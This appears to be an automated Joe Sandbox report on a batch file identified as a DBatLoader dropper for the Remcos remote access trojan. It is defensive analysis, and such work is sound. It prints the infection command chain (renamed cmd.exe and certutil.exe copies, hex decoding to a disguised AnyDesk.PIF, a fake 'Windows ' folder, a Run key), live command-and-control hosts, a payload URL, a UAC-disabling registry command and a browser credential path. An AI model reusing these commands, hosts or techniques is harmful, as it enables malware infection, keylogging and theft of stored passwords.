Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
saw.bat

Overview

General Information

Sample name:saw.bat
Analysis ID:1565803
MD5:0be98dc322d842f3f9952ca41c2fe012
SHA1:a0d32141b0c3bb39ce4f4e6a8d4fb0699341d4e3
SHA256:a1a77d48d276da51e97ce070b0d4c08c6f2900e8a2d4c15ce0adb4cff27c2669
Tags:batWsgiDAVuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Injects a PE file into a foreign processes
Opens the same file many times (likely Sandbox evasion)
Registers a new ROOT certificate
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: Suspicious Program Location with Network Connections
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 6784 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6828 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 6876 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6972 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 6964 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7068 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7080 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 3288 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: 35811E8D8969BEF5354C7C3E6DBEFB27)
      • cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 7112 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 6780 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • alpha.pif (PID: 6880 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 648 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 7032 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • xpha.pif (PID: 4924 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • alpha.pif (PID: 6972 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 6476 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 5232 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • esentutl.exe (PID: 6476 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • colorcpl.exe (PID: 7088 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
    • alpha.exe (PID: 3732 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 2200 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • Puyiaiob.PIF (PID: 5024 cmdline: "C:\Users\Public\Libraries\Puyiaiob.PIF" MD5: 35811E8D8969BEF5354C7C3E6DBEFB27)
    • SndVol.exe (PID: 3848 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Puyiaiob.PIF (PID: 1700 cmdline: "C:\Users\Public\Libraries\Puyiaiob.PIF" MD5: 35811E8D8969BEF5354C7C3E6DBEFB27)
    • colorcpl.exe (PID: 1432 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv"]}
{"Host:Port:Password": ["tre1ms.freeddns.org:2404:1", "freshmysweeterbk.ddns.net:2404:1", "mysweeterbk.ddns.net:2404:1", "bbhmeetre1ms.freeddns.org:2404:1", "myumysmeetr.ddns.net:2404:1", "meetre1ms.freeddns.org:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B5YX7T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "ANYDESKS"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\ANYDESKS\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 33 entries
            SourceRuleDescriptionAuthorStrings
            30.2.SndVol.exe.4a70000.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              30.2.SndVol.exe.4a70000.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                30.2.SndVol.exe.4a70000.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  30.2.SndVol.exe.4a70000.1.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c3ef:$a1: Remcos restarted by watchdog!
                  • 0x6c967:$a3: %02i:%02i:%02i:%03i
                  30.2.SndVol.exe.4a70000.1.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x66443:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x663bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x663bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x668bf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x670ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x664b3:$str_b2: Executing file:
                  • 0x67533:$str_b3: GetDirectListeningPort
                  • 0x66edf:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x6705f:$str_b7: \update.vbs
                  • 0x664db:$str_b9: Downloaded file:
                  • 0x664c7:$str_b10: Downloading file:
                  • 0x6656b:$str_b12: Failed to upload file:
                  • 0x674fb:$str_b13: StartForward
                  • 0x6751b:$str_b14: StopForward
                  • 0x66fb7:$str_b15: fso.DeleteFile "
                  • 0x66f4b:$str_b16: On Error Resume Next
                  • 0x66fe7:$str_b17: fso.DeleteFolder "
                  • 0x6655b:$str_b18: Uploaded file:
                  • 0x6651b:$str_b19: Unable to delete:
                  • 0x66f7f:$str_b20: while fso.FileExists("
                  • 0x669f8:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 68 entries

                  System Summary

                  barindex
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 6828, ProcessName: alpha.exe
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Puyiaiob.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Puyiaiob
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 6828, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 6876, ProcessName: extrac32.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7088, TargetFilename: C:\ProgramData\ANYDESKS
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.217.19.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Puyiaiob.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Puyiaiob
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, ProcessName: AnyDesk.PIF

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: E4 A7 6E AD 53 E0 44 C2 4E C2 25 A0 78 2F 30 9E 6F BA 5A AB D3 93 42 27 65 9D A1 C3 BF EA 4D F7 43 B2 93 D7 3F 91 4A 16 4A 96 29 C3 18 B4 B1 79 4B AE EA F3 3E F5 EA 3F 4E E3 30 DB 27 96 C4 74 BB A4 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B5YX7T\exepath
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T21:20:00.748532+010020283713Unknown Traffic192.168.2.449731172.217.19.238443TCP
                  2024-11-30T21:20:03.715665+010020283713Unknown Traffic192.168.2.449732142.250.181.33443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T21:20:14.399771+010020528511A Network Trojan was detected192.168.2.4593431.1.1.153UDP
                  2024-11-30T21:20:19.811277+010020528511A Network Trojan was detected192.168.2.4535471.1.1.153UDP
                  2024-11-30T21:20:24.638699+010020528511A Network Trojan was detected192.168.2.4651261.1.1.153UDP
                  2024-11-30T21:20:29.344915+010020528511A Network Trojan was detected192.168.2.4506671.1.1.153UDP
                  2024-11-30T21:20:35.170342+010020528511A Network Trojan was detected192.168.2.4564371.1.1.153UDP
                  2024-11-30T21:20:41.037495+010020528511A Network Trojan was detected192.168.2.4609741.1.1.153UDP
                  2024-11-30T21:20:46.866140+010020528511A Network Trojan was detected192.168.2.4604711.1.1.153UDP
                  2024-11-30T21:20:51.612708+010020528511A Network Trojan was detected192.168.2.4526341.1.1.153UDP
                  2024-11-30T21:20:56.331584+010020528511A Network Trojan was detected192.168.2.4655351.1.1.153UDP
                  2024-11-30T21:21:01.481594+010020528511A Network Trojan was detected192.168.2.4640851.1.1.153UDP
                  2024-11-30T21:21:06.610152+010020528511A Network Trojan was detected192.168.2.4516861.1.1.153UDP
                  2024-11-30T21:21:11.440707+010020528511A Network Trojan was detected192.168.2.4632561.1.1.153UDP
                  2024-11-30T21:21:16.223571+010020528511A Network Trojan was detected192.168.2.4559831.1.1.153UDP
                  2024-11-30T21:21:21.060028+010020528511A Network Trojan was detected192.168.2.4606811.1.1.153UDP
                  2024-11-30T21:21:26.142193+010020528511A Network Trojan was detected192.168.2.4537641.1.1.153UDP
                  2024-11-30T21:21:31.042434+010020528511A Network Trojan was detected192.168.2.4631741.1.1.153UDP
                  2024-11-30T21:21:36.037108+010020528511A Network Trojan was detected192.168.2.4650981.1.1.153UDP
                  2024-11-30T21:21:41.032602+010020528511A Network Trojan was detected192.168.2.4641701.1.1.153UDP
                  2024-11-30T21:21:46.033448+010020528511A Network Trojan was detected192.168.2.4586291.1.1.153UDP
                  2024-11-30T21:21:50.893873+010020528511A Network Trojan was detected192.168.2.4514711.1.1.153UDP
                  2024-11-30T21:21:56.174391+010020528511A Network Trojan was detected192.168.2.4629331.1.1.153UDP
                  2024-11-30T21:22:01.033886+010020528511A Network Trojan was detected192.168.2.4516981.1.1.153UDP
                  2024-11-30T21:22:06.033983+010020528511A Network Trojan was detected192.168.2.4630671.1.1.153UDP
                  2024-11-30T21:22:11.038041+010020528511A Network Trojan was detected192.168.2.4611981.1.1.153UDP
                  2024-11-30T21:22:16.186365+010020528511A Network Trojan was detected192.168.2.4635851.1.1.153UDP
                  2024-11-30T21:22:21.034494+010020528511A Network Trojan was detected192.168.2.4630711.1.1.153UDP
                  2024-11-30T21:22:25.897210+010020528511A Network Trojan was detected192.168.2.4543631.1.1.153UDP
                  2024-11-30T21:22:30.893976+010020528511A Network Trojan was detected192.168.2.4526111.1.1.153UDP
                  2024-11-30T21:22:36.033180+010020528511A Network Trojan was detected192.168.2.4513621.1.1.153UDP
                  2024-11-30T21:22:41.208520+010020528511A Network Trojan was detected192.168.2.4492631.1.1.153UDP
                  2024-11-30T21:22:46.032603+010020528511A Network Trojan was detected192.168.2.4641921.1.1.153UDP
                  2024-11-30T21:22:51.033308+010020528511A Network Trojan was detected192.168.2.4607261.1.1.153UDP
                  2024-11-30T21:22:51.174865+010020528511A Network Trojan was detected192.168.2.4607261.1.1.153UDP
                  2024-11-30T21:22:56.032219+010020528511A Network Trojan was detected192.168.2.4518221.1.1.153UDP
                  2024-11-30T21:23:01.039455+010020528511A Network Trojan was detected192.168.2.4513521.1.1.153UDP
                  2024-11-30T21:23:06.042884+010020528511A Network Trojan was detected192.168.2.4601611.1.1.153UDP
                  2024-11-30T21:23:10.894462+010020528511A Network Trojan was detected192.168.2.4544661.1.1.153UDP
                  2024-11-30T21:23:16.033884+010020528511A Network Trojan was detected192.168.2.4593651.1.1.153UDP
                  2024-11-30T21:23:16.174874+010020528511A Network Trojan was detected192.168.2.4593651.1.1.153UDP
                  2024-11-30T21:23:21.056906+010020528511A Network Trojan was detected192.168.2.4579951.1.1.153UDP
                  2024-11-30T21:23:26.032262+010020528511A Network Trojan was detected192.168.2.4543601.1.1.153UDP
                  2024-11-30T21:23:31.323503+010020528511A Network Trojan was detected192.168.2.4499821.1.1.153UDP
                  2024-11-30T21:23:36.042310+010020528511A Network Trojan was detected192.168.2.4633481.1.1.153UDP
                  2024-11-30T21:23:41.034582+010020528511A Network Trojan was detected192.168.2.4501051.1.1.153UDP
                  2024-11-30T21:23:46.033505+010020528511A Network Trojan was detected192.168.2.4532921.1.1.153UDP
                  2024-11-30T21:23:51.089996+010020528511A Network Trojan was detected192.168.2.4583961.1.1.153UDP
                  2024-11-30T21:23:55.896119+010020528511A Network Trojan was detected192.168.2.4596171.1.1.153UDP
                  2024-11-30T21:24:01.032838+010020528511A Network Trojan was detected192.168.2.4589891.1.1.153UDP
                  2024-11-30T21:24:01.175005+010020528511A Network Trojan was detected192.168.2.4589891.1.1.153UDP
                  2024-11-30T21:24:06.733108+010020528511A Network Trojan was detected192.168.2.4602231.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T21:20:14.960142+010020528491A Network Trojan was detected192.168.2.4620931.1.1.153UDP
                  2024-11-30T21:20:19.953778+010020528491A Network Trojan was detected192.168.2.4611551.1.1.153UDP
                  2024-11-30T21:20:25.968305+010020528491A Network Trojan was detected192.168.2.4510461.1.1.153UDP
                  2024-11-30T21:20:31.508606+010020528491A Network Trojan was detected192.168.2.4583771.1.1.153UDP
                  2024-11-30T21:20:36.414866+010020528491A Network Trojan was detected192.168.2.4522311.1.1.153UDP
                  2024-11-30T21:20:41.207197+010020528491A Network Trojan was detected192.168.2.4546161.1.1.153UDP
                  2024-11-30T21:20:47.011625+010020528491A Network Trojan was detected192.168.2.4528101.1.1.153UDP
                  2024-11-30T21:20:52.775781+010020528491A Network Trojan was detected192.168.2.4539101.1.1.153UDP
                  2024-11-30T21:20:57.410476+010020528491A Network Trojan was detected192.168.2.4645621.1.1.153UDP
                  2024-11-30T21:21:02.425920+010020528491A Network Trojan was detected192.168.2.4521501.1.1.153UDP
                  2024-11-30T21:21:07.395180+010020528491A Network Trojan was detected192.168.2.4495331.1.1.153UDP
                  2024-11-30T21:21:12.097825+010020528491A Network Trojan was detected192.168.2.4536131.1.1.153UDP
                  2024-11-30T21:21:17.114683+010020528491A Network Trojan was detected192.168.2.4515161.1.1.153UDP
                  2024-11-30T21:21:21.925966+010020528491A Network Trojan was detected192.168.2.4527891.1.1.153UDP
                  2024-11-30T21:21:26.914161+010020528491A Network Trojan was detected192.168.2.4515961.1.1.153UDP
                  2024-11-30T21:21:31.894876+010020528491A Network Trojan was detected192.168.2.4532241.1.1.153UDP
                  2024-11-30T21:21:36.899306+010020528491A Network Trojan was detected192.168.2.4512541.1.1.153UDP
                  2024-11-30T21:21:41.897578+010020528491A Network Trojan was detected192.168.2.4567691.1.1.153UDP
                  2024-11-30T21:21:46.893853+010020528491A Network Trojan was detected192.168.2.4586911.1.1.153UDP
                  2024-11-30T21:21:51.893728+010020528491A Network Trojan was detected192.168.2.4580651.1.1.153UDP
                  2024-11-30T21:21:56.894636+010020528491A Network Trojan was detected192.168.2.4590561.1.1.153UDP
                  2024-11-30T21:22:01.894428+010020528491A Network Trojan was detected192.168.2.4635861.1.1.153UDP
                  2024-11-30T21:22:06.894415+010020528491A Network Trojan was detected192.168.2.4618091.1.1.153UDP
                  2024-11-30T21:22:11.907482+010020528491A Network Trojan was detected192.168.2.4634641.1.1.153UDP
                  2024-11-30T21:22:16.894491+010020528491A Network Trojan was detected192.168.2.4530971.1.1.153UDP
                  2024-11-30T21:22:21.894245+010020528491A Network Trojan was detected192.168.2.4648661.1.1.153UDP
                  2024-11-30T21:22:26.895645+010020528491A Network Trojan was detected192.168.2.4502441.1.1.153UDP
                  2024-11-30T21:22:31.896283+010020528491A Network Trojan was detected192.168.2.4545801.1.1.153UDP
                  2024-11-30T21:22:36.893931+010020528491A Network Trojan was detected192.168.2.4573671.1.1.153UDP
                  2024-11-30T21:22:41.894481+010020528491A Network Trojan was detected192.168.2.4582421.1.1.153UDP
                  2024-11-30T21:22:46.894748+010020528491A Network Trojan was detected192.168.2.4578911.1.1.153UDP
                  2024-11-30T21:22:51.893869+010020528491A Network Trojan was detected192.168.2.4546891.1.1.153UDP
                  2024-11-30T21:22:56.894174+010020528491A Network Trojan was detected192.168.2.4566221.1.1.153UDP
                  2024-11-30T21:23:02.390722+010020528491A Network Trojan was detected192.168.2.4526411.1.1.153UDP
                  2024-11-30T21:23:06.894731+010020528491A Network Trojan was detected192.168.2.4493951.1.1.153UDP
                  2024-11-30T21:23:11.893924+010020528491A Network Trojan was detected192.168.2.4599151.1.1.153UDP
                  2024-11-30T21:23:16.894492+010020528491A Network Trojan was detected192.168.2.4507971.1.1.153UDP
                  2024-11-30T21:23:21.894498+010020528491A Network Trojan was detected192.168.2.4506241.1.1.153UDP
                  2024-11-30T21:23:26.896938+010020528491A Network Trojan was detected192.168.2.4653431.1.1.153UDP
                  2024-11-30T21:23:31.897394+010020528491A Network Trojan was detected192.168.2.4499901.1.1.153UDP
                  2024-11-30T21:23:36.893954+010020528491A Network Trojan was detected192.168.2.4583031.1.1.153UDP
                  2024-11-30T21:23:41.894501+010020528491A Network Trojan was detected192.168.2.4519421.1.1.153UDP
                  2024-11-30T21:23:46.896096+010020528491A Network Trojan was detected192.168.2.4622861.1.1.153UDP
                  2024-11-30T21:23:51.894078+010020528491A Network Trojan was detected192.168.2.4627821.1.1.153UDP
                  2024-11-30T21:23:56.894437+010020528491A Network Trojan was detected192.168.2.4575781.1.1.153UDP
                  2024-11-30T21:24:01.894548+010020528491A Network Trojan was detected192.168.2.4531011.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T21:20:14.165777+010020528521A Network Trojan was detected192.168.2.4581941.1.1.153UDP
                  2024-11-30T21:20:19.664894+010020528521A Network Trojan was detected192.168.2.4510831.1.1.153UDP
